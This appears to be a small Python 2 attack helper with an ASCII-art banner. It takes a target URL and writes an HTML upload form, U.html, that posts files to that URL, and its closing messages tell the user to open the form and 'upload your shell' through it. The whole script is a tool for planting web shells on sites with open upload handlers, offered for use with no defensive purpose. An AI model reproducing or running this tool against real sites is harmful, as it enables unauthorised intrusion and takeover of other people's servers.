print """

 ______    _________    __    __       __    __        __      _  __      __ 
(_  __ \   )____   /    \ \  / /       \ \  / /       /  \    / ) ) \    / ( 
  ) ) \ \    ___) /     () \/ ()       () \/ ()      / /\ \  / /   \ \  / /  
 ( (   ) )   )__ (      / _  _ \       / _  _ \      ) ) ) ) ) )    \ \/ /   
  ) )  ) )      ) )    / / \/ \ \     / / \/ \ \    ( ( ( ( ( (      \  /    
 / /__/ /      ( (    /_/      \_\   /_/      \_\   / /  \ \/ /       )(     
(______/       /__\  (/          \) (/          \) (_/    \__/       /__\ 

"""
x=raw_input("enter ur URL HERE <>: ") 


up=open("U.html","w")

up.write('''<html>
<body>
<form enctype="multipart/form-data" action="''',)
up.write(x)
up.write('''" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="UPLOAD!" />
</form>
</body>
</html>''')

print ('1-The Upload File is Ready try to upload your shell ! ')
print ('2-U JUST have to open U.html then upluad your shell form there > HAve a Good Day BB ')




